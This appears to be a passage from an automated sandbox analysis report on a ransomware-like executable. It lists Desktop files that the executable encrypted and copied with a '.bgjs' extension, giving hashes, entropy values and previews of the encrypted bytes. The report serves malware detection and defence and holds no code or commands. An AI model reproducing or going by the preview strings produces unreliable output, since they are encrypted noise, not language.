                                                                                                                                      Preview:CZQKS......@2.0.&..SX}T....R.h.....u......'..(.}T]..R.l+. c6.M...RD.t......D.9\......)..k<.KIx.:}.S.y......a.5..E.<V..........x(}.....=.$.v..d[8..G.....R..bb..j/~.1....?.....qS..E..E.....W...zA...M..p..-nP......|G`..b&Z..|Z......o...K.4.II.GF.nzK.[..].U.E2t...!..Q.c..z......T..V.q!dF.k.(..C...o.S......xp....I....#b.....Q..'..u}.U.)Utrb.(.".k....F....2..........:|T.."W.<k).J.p..[.Y{...7o..h..M,.g....D..%u..h.s>3.k..j.x^....2.Uo.%.yf..oL.,e.;..O..Nq...3...v....Yv.gH..?..B....ZlI..w.....Y.k.'= ..C$..}.....BE.+C..^>.....].mZ....0.=.:M..x...T....G....^.nC....0Ki....]f..0....8...vl.@...!C..,.H.......}.4..<.C.....a[..j......T.1K<w..9.....m.7...N..0...F.f8.....p...x1m...../..B..........LZ..P8..f=u....$...z..X...d$.........X..9..%.0K..C..c..k....iQ..Y.).N7..N.[..|..p.7..y..lq.BTXE.........iu.w..0...l...&7...m....?1..)...T......5x..C1...=T..L...........H..*K....vg.8....j.....e.. ....U8M&.}.......'..{.a(..Om.3*...[. ^.D.,.....weC2.P

                                                                                                                                      C:\Users\user\Desktop\GLTYDMDUST.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.863756762433557
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:boXEFmUkSTNksx3HwHCa7vWXf0LvsRTe3gXyWkBz4sjF5ebD:boUmlSusxEBUcLvs9eETkp4auD
                                                                                                                                      MD5:2AFE89AA5FC984C64B5144CCCAE9D54C
                                                                                                                                      SHA1:AA1BA019FAB535E49CF55BE54FB24DB22DBC350F
                                                                                                                                      SHA-256:BC53F97A3DF6B1B6E70D7A58A22636996F4EBDA068E3A79D90326C2E8C1280C5
                                                                                                                                      SHA-512:CBC569EE2F9D7D25A2443EEB9930FC911EB11A23CB0896F70C0D6537744C43A6EC0D682FCDA470E335F5996732008206E7DC9C2A4D3210427860AA7A6D21CC36
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:GLTYD.;~..5.R...uW.1.....1...u"l_Z.....xU..^N.mX.YT..a.'..u6Vt.[x-!..w......~..0Pr..JWZ...w.v..L.....8...R...~.%.gq...o... +...b..%u...h......Y...n%R..z.6...S..a....`i(.....\.'.fP..CX2.aD!...lL..D.......g:n..S-..........2..V...?.N!.F...<..N/9.H....$C...i..P.Q.?.R...;p.E<".@+...i.!*...e..f...7.1b.qs..u.......;|..r[..(.......V......naJ.|2.lT&.{.]..1...r.h< ..Z{.w=...s..8......,.....}L6Zd%_.$o*...|%...UE..uo...\.....d[.4........oMZ..05A.Zt.f.....Hl.....6fU0...s.(.......6.[./81.h.g}.9a.Y ..'..+....,xc..z.{..M.Z.G...K...^.\....T;W.H../..%q...."...$......dS2._.-..6+...7.7lpPM%....v....}.aG........0..m..h2g....WD.....z..~.w.)N.0....6.(..R;.EQ#s....)...x.nS..*..K...t...{.?$...Ci~......... ..R......^.|...3,Q...X.|....'.......).6.w~............!.R.......qua..k..._....ZF]}..M.H...\.#.P..2..VS]...V..z..).v..?.B.3.O.?.j......M.*...m..]....BH5.....T"E.....u..k..E..(]..m......o.V~..ir..7Yv,.y..\..H.Q$..y1i?.X%T..A..`.b......a8...5a.7.....5.x.r...~,.Y

                                                                                                                                      C:\Users\user\Desktop\GLTYDMDUST.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.863756762433557
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:boXEFmUkSTNksx3HwHCa7vWXf0LvsRTe3gXyWkBz4sjF5ebD:boUmlSusxEBUcLvs9eETkp4auD
                                                                                                                                      MD5:2AFE89AA5FC984C64B5144CCCAE9D54C
                                                                                                                                      SHA1:AA1BA019FAB535E49CF55BE54FB24DB22DBC350F
                                                                                                                                      SHA-256:BC53F97A3DF6B1B6E70D7A58A22636996F4EBDA068E3A79D90326C2E8C1280C5
                                                                                                                                      SHA-512:CBC569EE2F9D7D25A2443EEB9930FC911EB11A23CB0896F70C0D6537744C43A6EC0D682FCDA470E335F5996732008206E7DC9C2A4D3210427860AA7A6D21CC36
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.;~..5.R...uW.1.....1...u"l_Z.....xU..^N.mX.YT..a.'..u6Vt.[x-!..w......~..0Pr..JWZ...w.v..L.....8...R...~.%.gq...o... +...b..%u...h......Y...n%R..z.6...S..a....`i(.....\.'.fP..CX2.aD!...lL..D.......g:n..S-..........2..V...?.N!.F...<..N/9.H....$C...i..P.Q.?.R...;p.E<".@+...i.!*...e..f...7.1b.qs..u.......;|..r[..(.......V......naJ.|2.lT&.{.]..1...r.h< ..Z{.w=...s..8......,.....}L6Zd%_.$o*...|%...UE..uo...\.....d[.4........oMZ..05A.Zt.f.....Hl.....6fU0...s.(.......6.[./81.h.g}.9a.Y ..'..+....,xc..z.{..M.Z.G...K...^.\....T;W.H../..%q...."...$......dS2._.-..6+...7.7lpPM%....v....}.aG........0..m..h2g....WD.....z..~.w.)N.0....6.(..R;.EQ#s....)...x.nS..*..K...t...{.?$...Ci~......... ..R......^.|...3,Q...X.|....'.......).6.w~............!.R.......qua..k..._....ZF]}..M.H...\.#.P..2..VS]...V..z..).v..?.B.3.O.?.j......M.*...m..]....BH5.....T"E.....u..k..E..(]..m......o.V~..ir..7Yv,.y..\..H.Q$..y1i?.X%T..A..`.b......a8...5a.7.....5.x.r...~,.Y

                                                                                                                                      C:\Users\user\Desktop\GLTYDMDUST.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861153207155717
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:raQ/Lo8km+dSEfPtbjnQ9taafoTG3Y4TKK6dnhO2u+6QB0mBqu6zgI/0apebD:raQ/LlcUwPtPQeaUG3Yp/hru+7B0mB/r
                                                                                                                                      MD5:2E211C24F3E3A8CB65126935D8C59C1A
                                                                                                                                      SHA1:199F5A7822B9F827EF3056BF20FC9CCA8BA704DB
                                                                                                                                      SHA-256:937F87FD0596943BE20B1944A13139B0ABC2CC04BFE71C5121EC4807E2713A83
                                                                                                                                      SHA-512:EA9DDA9E6C7A10B8720C61B64C88D3B15004470F8F0F7016F8C7BA1C9D8265DA32822C0DC043C629590DDD8794B3063C66B99D35194D78645A819D43A83D2C8E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:GLTYD.u.K6.......7.\.G..~W...H~aDE..w-+..[..J.^.r....N.k.w,..r.V.%f......y..N.Yc.bvW.g........6...E.\.....]..;.jX~X.y..(G...o&.....p.......M.....0.h..%6G.0._...[._.|.[Od..L..vg.*b..1j.q.....w..:.0.(s.o-./.r..\7.T.)i.}vteO...2Z...U..1....><....."..D..~.zC.........Fr...n.O......Yk.....J..V..0g..cj..w..........X$U..~.<..f.V...q%>..~...Q#.|......)o.,..Pz7..(d...KI..y..mVu....k`....N..[...M>..#.K...B?&3..p.u.c...h$..r].u.Z...^..E1.T.....P.S..cu...,y....v.5.F.r.....K..wL).cL.X1.......0....@.%y."X...ZO...._..8.;.`|...`./....nUA.......{.C.).^wC5...iV..7..Dd..7A=(#.Q9u...(.....x...'...%.A.2.....+......To...p....._...D.DtQ..WI.k..k.9.!&..U^........1.{........^nW.....J...I.s........F.32...+....'qv.=.w.E....U.J.|. t.k.I..62. ..D.{....|.."....3%......f..ppZ.^.<<.2.m...2P#f....Ia.....Z.=...r....p'......0..d....^.4;.i.M.N7...ll...Tc....a5.S.......-...5....>%6........|.{RY.#..W...K.`gXz"n.1.8.1..;..j.)G.R..#.:.......p:.2K........?.A...r.A...}...S

                                                                                                                                      C:\Users\user\Desktop\GLTYDMDUST.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.861153207155717
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:raQ/Lo8km+dSEfPtbjnQ9taafoTG3Y4TKK6dnhO2u+6QB0mBqu6zgI/0apebD:raQ/LlcUwPtPQeaUG3Yp/hru+7B0mB/r
                                                                                                                                      MD5:2E211C24F3E3A8CB65126935D8C59C1A
                                                                                                                                      SHA1:199F5A7822B9F827EF3056BF20FC9CCA8BA704DB
                                                                                                                                      SHA-256:937F87FD0596943BE20B1944A13139B0ABC2CC04BFE71C5121EC4807E2713A83
                                                                                                                                      SHA-512:EA9DDA9E6C7A10B8720C61B64C88D3B15004470F8F0F7016F8C7BA1C9D8265DA32822C0DC043C629590DDD8794B3063C66B99D35194D78645A819D43A83D2C8E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.u.K6.......7.\.G..~W...H~aDE..w-+..[..J.^.r....N.k.w,..r.V.%f......y..N.Yc.bvW.g........6...E.\.....]..;.jX~X.y..(G...o&.....p.......M.....0.h..%6G.0._...[._.|.[Od..L..vg.*b..1j.q.....w..:.0.(s.o-./.r..\7.T.)i.}vteO...2Z...U..1....><....."..D..~.zC.........Fr...n.O......Yk.....J..V..0g..cj..w..........X$U..~.<..f.V...q%>..~...Q#.|......)o.,..Pz7..(d...KI..y..mVu....k`....N..[...M>..#.K...B?&3..p.u.c...h$..r].u.Z...^..E1.T.....P.S..cu...,y....v.5.F.r.....K..wL).cL.X1.......0....@.%y."X...ZO...._..8.;.`|...`./....nUA.......{.C.).^wC5...iV..7..Dd..7A=(#.Q9u...(.....x...'...%.A.2.....+......To...p....._...D.DtQ..WI.k..k.9.!&..U^........1.{........^nW.....J...I.s........F.32...+....'qv.=.w.E....U.J.|. t.k.I..62. ..D.{....|.."....3%......f..ppZ.^.<<.2.m...2P#f....Ia.....Z.=...r....p'......0..d....^.4;.i.M.N7...ll...Tc....a5.S.......-...5....>%6........|.{RY.#..W...K.`gXz"n.1.8.1..;..j.)G.R..#.:.......p:.2K........?.A...r.A...}...S

                                                                                                                                      C:\Users\user\Desktop\HMPPSXQPQV.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.857345090335903
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4K9oCNKQ85aI2tYLIOxX0zo9OAKhbqLrK8HfUCKRicebTX4vNPcEgpfFlbD:Z9owIMFOx0zZXeLO8HsCKMcevoNPcl1D
                                                                                                                                      MD5:1DB2FA417D107C256125BCCD9D6459B1
                                                                                                                                      SHA1:05C62CE471865C302FF562B8704A1C8E3C732314
                                                                                                                                      SHA-256:823247644531649AB7271065E9A5E83D904C625BEC5A9028FA66CF1FA3FC5766
                                                                                                                                      SHA-512:F66E39F9CB8D2564715E659CE6019D53B5509B9B958DD208B573216EC28943EBAC1A78AA2E1FDAE4AE3C729C2DCE501343CBBB09F9CB622CC53D759AE248D592
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS.\....\.<....m........X......a..`.+|..$..I.{....2..)!.97+v..<.1...8.'...$.uf..}=..k@......#..}..z....U.j..x.'.T.>{]h./.L"......X.w-...$.....s.B......7.0.4..E.....C....~....oT.8..~.:.6.6.fk].,.~6*.4..Cr..!r.......!n.X.u ....=.q.(=.3:0.;z..7.._.B.%.'._aS.i.6....J>.W...IQ.K....o.k.&...f.........H.F..$._.i-[B..4v..uK.4.:..{.3.2..}M:..In.u...~..q.#d....~W.1.\.8.4...!`%.<(..^..Q.....G........F..Fj..rK.Q.3^......x.......3F..Yf...f1..;.M..n.9.......Z.?.Ev.qEgZ.7.G.k..^..c.n....tB..9yh........n9.y..XM.Nk(../..q...?e#.E.._qR....5....P.]...1.Q... .`........m/=..j+..R..k5.u...`...\c...*Vo.o..>.fbuT....t.0K.g..."..\q6t. ......)&.p.|Uq_D........y^*..,1.P~....._D.6}...T.N..3......7\.HW..&......~N/U...i...r0i?[....g..*..'.Q..."j.|.x..I=...8.|..m.,.?..g..m.[.h@x.V..z(.x..f..nUr..@.cb.....I..p...j..#.6.ts......(..t......M......N..:.M...4#...J.......L.,.n).....o..%..X.t..8.SG...i......../".......R.&....3.z.W...v..$.>S.|....b.....j../Xg.V...N

                                                                                                                                      C:\Users\user\Desktop\HMPPSXQPQV.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.857345090335903
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:4K9oCNKQ85aI2tYLIOxX0zo9OAKhbqLrK8HfUCKRicebTX4vNPcEgpfFlbD:Z9owIMFOx0zZXeLO8HsCKMcevoNPcl1D
                                                                                                                                      MD5:1DB2FA417D107C256125BCCD9D6459B1
                                                                                                                                      SHA1:05C62CE471865C302FF562B8704A1C8E3C732314
                                                                                                                                      SHA-256:823247644531649AB7271065E9A5E83D904C625BEC5A9028FA66CF1FA3FC5766
                                                                                                                                      SHA-512:F66E39F9CB8D2564715E659CE6019D53B5509B9B958DD208B573216EC28943EBAC1A78AA2E1FDAE4AE3C729C2DCE501343CBBB09F9CB622CC53D759AE248D592
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS.\....\.<....m........X......a..`.+|..$..I.{....2..)!.97+v..<.1...8.'...$.uf..}=..k@......#..}..z....U.j..x.'.T.>{]h./.L"......X.w-...$.....s.B......7.0.4..E.....C....~....oT.8..~.:.6.6.fk].,.~6*.4..Cr..!r.......!n.X.u ....=.q.(=.3:0.;z..7.._.B.%.'._aS.i.6....J>.W...IQ.K....o.k.&...f.........H.F..$._.i-[B..4v..uK.4.:..{.3.2..}M:..In.u...~..q.#d....~W.1.\.8.4...!`%.<(..^..Q.....G........F..Fj..rK.Q.3^......x.......3F..Yf...f1..;.M..n.9.......Z.?.Ev.qEgZ.7.G.k..^..c.n....tB..9yh........n9.y..XM.Nk(../..q...?e#.E.._qR....5....P.]...1.Q... .`........m/=..j+..R..k5.u...`...\c...*Vo.o..>.fbuT....t.0K.g..."..\q6t. ......)&.p.|Uq_D........y^*..,1.P~....._D.6}...T.N..3......7\.HW..&......~N/U...i...r0i?[....g..*..'.Q..."j.|.x..I=...8.|..m.,.?..g..m.[.h@x.V..z(.x..f..nUr..@.cb.....I..p...j..#.6.ts......(..t......M......N..:.M...4#...J.......L.,.n).....o..%..X.t..8.SG...i......../".......R.&....3.z.W...v..$.>S.|....b.....j../Xg.V...N

                                                                                                                                      C:\Users\user\Desktop\LFOPODGVOH.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.856685072693378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HB9wQ9Pl3IWfJBSf7YQYHvsLTEXQStI5NUKDPsh5oITMxNrwCcATdMfbD:HsQ9PltxBSf7TlLwXQStI5F+VTKsUuDD
                                                                                                                                      MD5:469C200015C684D259CB3D54C36A40BA
                                                                                                                                      SHA1:1532D9BA0C1F0F094FC0839B74F99FD3CB7CBF37
                                                                                                                                      SHA-256:ADF072B19FC1BC7884EDFA57BAA6A83437EDCE11AAB52E7BA64B81B81E9A99FA
                                                                                                                                      SHA-512:B009FAF899E912A33F97923DA7C76D8415D4419DBF4D74D4BA773D1AE1D4B38F499914275D925A04679B7C8B761CF825F4266A1344C37BF630EF7E44258238F2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO.L...l.].K}..g1t..?F.R.ZQ.$/.B..%.W...D.A...`.s.B..x.k....}.]..Yc..s.....c~..w.g.e.:1...&.....u............>..oT....K...D..0...S.^A}y*Tr.,..U..1$..2.i.....S...Og...2v...vl..}....].e....g}..S..S.%..#.,E..."....h.".........S..uK..^.z=p..A.U`i"s.o.....5.b...$..n...4..t?.."Y...V.....M..',0...fb.=.'.6)..&./....ex.`3.Cp<o..j ........G..K.]).P...4Ne.9.G.T......L..."\g..J.J..z}....sT.b..E(P.(=:>........?........o`$m..^.':......9.}i.S.Q..1.wE..p/.}r..D.e....`P...P..~s.K..A.#..o..G.9..J.~.{.?...Q..`.......c.^.....4u.....S...O.....J0.Lf.2..S...gO.b.Z6G4i?Dk.....C.......W.+&.o..A...n/.....B...a.]....<...)..).....).YD....q.rv...I......vJB....Q.1....,>>..#F&..-.2..r...Y..z.....9.Kh~U.v~0......C.....c! .j.O....t+:...5-.$.=..O..1.6X...Zm.tO.Q.`...IS[.b/...m}....XH.~/....F...aN.|.p(Yb.T6.!9...=w.d.d./.3..mK..P.LG3=...$( ...".x.../R....r........0.iO:....*.X...x.._.*\.o.......M.w9.32...-j5.UR..k.*xc.....\e.>.....:".....(.TY...J.9.A.P....L.:p.....|5s.k...I.L.c

                                                                                                                                      C:\Users\user\Desktop\LFOPODGVOH.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.856685072693378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HB9wQ9Pl3IWfJBSf7YQYHvsLTEXQStI5NUKDPsh5oITMxNrwCcATdMfbD:HsQ9PltxBSf7TlLwXQStI5F+VTKsUuDD
                                                                                                                                      MD5:469C200015C684D259CB3D54C36A40BA
                                                                                                                                      SHA1:1532D9BA0C1F0F094FC0839B74F99FD3CB7CBF37
                                                                                                                                      SHA-256:ADF072B19FC1BC7884EDFA57BAA6A83437EDCE11AAB52E7BA64B81B81E9A99FA
                                                                                                                                      SHA-512:B009FAF899E912A33F97923DA7C76D8415D4419DBF4D74D4BA773D1AE1D4B38F499914275D925A04679B7C8B761CF825F4266A1344C37BF630EF7E44258238F2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO.L...l.].K}..g1t..?F.R.ZQ.$/.B..%.W...D.A...`.s.B..x.k....}.]..Yc..s.....c~..w.g.e.:1...&.....u............>..oT....K...D..0...S.^A}y*Tr.,..U..1$..2.i.....S...Og...2v...vl..}....].e....g}..S..S.%..#.,E..."....h.".........S..uK..^.z=p..A.U`i"s.o.....5.b...$..n...4..t?.."Y...V.....M..',0...fb.=.'.6)..&./....ex.`3.Cp<o..j ........G..K.]).P...4Ne.9.G.T......L..."\g..J.J..z}....sT.b..E(P.(=:>........?........o`$m..^.':......9.}i.S.Q..1.wE..p/.}r..D.e....`P...P..~s.K..A.#..o..G.9..J.~.{.?...Q..`.......c.^.....4u.....S...O.....J0.Lf.2..S...gO.b.Z6G4i?Dk.....C.......W.+&.o..A...n/.....B...a.]....<...)..).....).YD....q.rv...I......vJB....Q.1....,>>..#F&..-.2..r...Y..z.....9.Kh~U.v~0......C.....c! .j.O....t+:...5-.$.=..O..1.6X...Zm.tO.Q.`...IS[.b/...m}....XH.~/....F...aN.|.p(Yb.T6.!9...=w.d.d./.3..mK..P.LG3=...$( ...".x.../R....r........0.iO:....*.X...x.._.*\.o.......M.w9.32...-j5.UR..k.*xc.....\e.>.....:".....(.TY...J.9.A.P....L.:p.....|5s.k...I.L.c

                                                                                                                                      C:\Users\user\Desktop\NWCXBPIUYI.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.843890923620445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HQRS6GQZCWPcTBLIw1kCCn8u1ms3N8UJssN/murbLMwNyfSbD:wRRZCWPsIw1kCCndd8UTVdPLMwNyYD
                                                                                                                                      MD5:9EE300A23892BBB24423F75B26AC1E04
                                                                                                                                      SHA1:A7B6E865E909C4B6115812800AC94A580411EC3C
                                                                                                                                      SHA-256:04BFDEB3815C5590759ACAFDE9C324FC9E194FA0B56CFD689B3626E3CDACBAFC
                                                                                                                                      SHA-512:352F2E432EBC24DB8D19F4394C26E02086B1373388F4F37902B3820FA32888493163701F80F09ADF900E0AA56D9EA9808F5BD84912657B15F3A858F3513BEED9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB>v\.\u.1D...G5y..;.<..1.R..z..64?.wx*.j.C=J.M..CR.?...NJ.".R.....)).dB.8.yC.^e.t...........O.......\...6...L .....f.....;.Gz....b]RCn.9.......(.....l7......$..7...y.-..Qh..Ho!UqtH%...f%....[.[.%...RT*<..e..,....,{:.Nr......Ql.......iko..'..<.p...Z#...K.z...\....E'.....XU..P..".l.Z.#.~j7..HY.z...(w......{.r..*..u.m.!....4.^.....rg...]...:......<b..s..F$...D>.&.q.+.....`..........EQ....{..H.0ulX.p....D.Fu.kZb.#E.....0...F..i.w.s3.< TV*..J.}.n.g....@#..._zGC.rEgH.....r...A.L.F.....o6..|.D.o.Z..l...+.....d.8....]1.$...P...'.+.n..;G.=9....*./..5I....4J...\.D.S)O".FJ.g........l.....L.....#8F.7. ..guPuV...71.x.B.".L..qX.....7&..J.G..%n.1..*...8....K..x......V..4uYn.....J.D...:FhI......E.~.0..bt:...h(.b.>v.er.@.~Zj...t...H.Df.o+..6.....~.....,t>:.Y.jM.*&)Y....=.=[z?.bd..c8.%Q.T..'.pj.(H.o[..a[.L.^$0..<.r..G(....;..m.k......:.FmT.D. .....K... cL.5.r)..C..j......Og..VYb.D....7....X..lD9....6..w........rn.f.`w_U.....x.".Z.x)..Q....hkx.[2.5Tf.....

                                                                                                                                      C:\Users\user\Desktop\NWCXBPIUYI.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.843890923620445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HQRS6GQZCWPcTBLIw1kCCn8u1ms3N8UJssN/murbLMwNyfSbD:wRRZCWPsIw1kCCndd8UTVdPLMwNyYD
                                                                                                                                      MD5:9EE300A23892BBB24423F75B26AC1E04
                                                                                                                                      SHA1:A7B6E865E909C4B6115812800AC94A580411EC3C
                                                                                                                                      SHA-256:04BFDEB3815C5590759ACAFDE9C324FC9E194FA0B56CFD689B3626E3CDACBAFC
                                                                                                                                      SHA-512:352F2E432EBC24DB8D19F4394C26E02086B1373388F4F37902B3820FA32888493163701F80F09ADF900E0AA56D9EA9808F5BD84912657B15F3A858F3513BEED9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB>v\.\u.1D...G5y..;.<..1.R..z..64?.wx*.j.C=J.M..CR.?...NJ.".R.....)).dB.8.yC.^e.t...........O.......\...6...L .....f.....;.Gz....b]RCn.9.......(.....l7......$..7...y.-..Qh..Ho!UqtH%...f%....[.[.%...RT*<..e..,....,{:.Nr......Ql.......iko..'..<.p...Z#...K.z...\....E'.....XU..P..".l.Z.#.~j7..HY.z...(w......{.r..*..u.m.!....4.^.....rg...]...:......<b..s..F$...D>.&.q.+.....`..........EQ....{..H.0ulX.p....D.Fu.kZb.#E.....0...F..i.w.s3.< TV*..J.}.n.g....@#..._zGC.rEgH.....r...A.L.F.....o6..|.D.o.Z..l...+.....d.8....]1.$...P...'.+.n..;G.=9....*./..5I....4J...\.D.S)O".FJ.g........l.....L.....#8F.7. ..guPuV...71.x.B.".L..qX.....7&..J.G..%n.1..*...8....K..x......V..4uYn.....J.D...:FhI......E.~.0..bt:...h(.b.>v.er.@.~Zj...t...H.Df.o+..6.....~.....,t>:.Y.jM.*&)Y....=.=[z?.bd..c8.%Q.T..'.pj.(H.o[..a[.L.^$0..<.r..G(....;..m.k......:.FmT.D. .....K... cL.5.r)..C..j......Og..VYb.D....7....X..lD9....6..w........rn.f.`w_U.....x.".Z.x)..Q....hkx.[2.5Tf.....

                                                                                                                                      C:\Users\user\Desktop\NWCXBPIUYI.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.832257957290305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rkMIXH1LCA7BZF5Eicn0ek0jKGAGY0LkQ3M+G3a/bD:rbIXVl7BZYicn0eMe2+GqjD
                                                                                                                                      MD5:A1A7635D75D9D4317145F67FCCCB9792
                                                                                                                                      SHA1:02DEC411AD48DCB0B1C85C4F39C16D8DC8BC0448
                                                                                                                                      SHA-256:ED0127A9E431043F4D7E59A4BB432B61AD61DB5E4DB5C051C7457E62DE3E6591
                                                                                                                                      SHA-512:1944ABF51DAB626B171D187F83A6F6F140C6572E6C3569F2539F8496E94FB467B665C3AE3095A61C9F248AC222347375785B32C6C23062AD6F8815B64CC644D5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB.yz.".0.G'?Nb.m.....H..2i........ac.t...1c....9m-....F/qW..q;.q..+.g[....x...n..Lme...e..:.-HK.i.+O.&.C....._s..]..~....k..6...~.........4E;.`CQ:S.Z....s.{...E..PfWn.G...C....'$....3.+L.....>.8...U.hht.l.4X..;x....q..T|..S.n..&....[.;...G..G..:.....=..?pSL..n5..MGI.,_o.g8*.Y>.....;.........../We@Q..Y {..z.g.. ....`^T+d..Z5=XM..m...r9bC...|.Y<G5..>.....jH=...bu;Mj.......f.g.tI..p..b=$+...~...n...0...m..........e...R.... zd.8.}..H..F..,.o...T.w..1f,a.o7t..8.E..Hf.3;...P>;.f.|.L.2.-.t*.f....j{.v..-.%01.qWy.H.<h.|.N...0..O...M. .yM]P..r.]....v....!.F..u..A..-Y...Y...na{..ZbF[o...oa......t`.6..W...3z........ . ...W..w.KuQ...>......".ql.R.T6.....M....A..Z...*...).No...A.]n.m.8&..r`.t..>.......8..QI...v).e....q..b}uG.?f....7o.}.X..n!}..........e.{.,|Si:...T`...y....<Y.9.Vo.W.Q...\N.n...la.-.x.-yED.3.7.>v.>S.!.....#..].n^g0.3.."f..v!'........}P.c..e..s.....>.b...M.jX.H..Pw.K......*B3(.C1I..>6QM.Q.p>?.....N...3.o.7,...]..3..m..w.|Y.....S..

                                                                                                                                      C:\Users\user\Desktop\NWCXBPIUYI.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.832257957290305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rkMIXH1LCA7BZF5Eicn0ek0jKGAGY0LkQ3M+G3a/bD:rbIXVl7BZYicn0eMe2+GqjD
                                                                                                                                      MD5:A1A7635D75D9D4317145F67FCCCB9792
                                                                                                                                      SHA1:02DEC411AD48DCB0B1C85C4F39C16D8DC8BC0448
                                                                                                                                      SHA-256:ED0127A9E431043F4D7E59A4BB432B61AD61DB5E4DB5C051C7457E62DE3E6591
                                                                                                                                      SHA-512:1944ABF51DAB626B171D187F83A6F6F140C6572E6C3569F2539F8496E94FB467B665C3AE3095A61C9F248AC222347375785B32C6C23062AD6F8815B64CC644D5
                                                                                                                                      Malicious:false
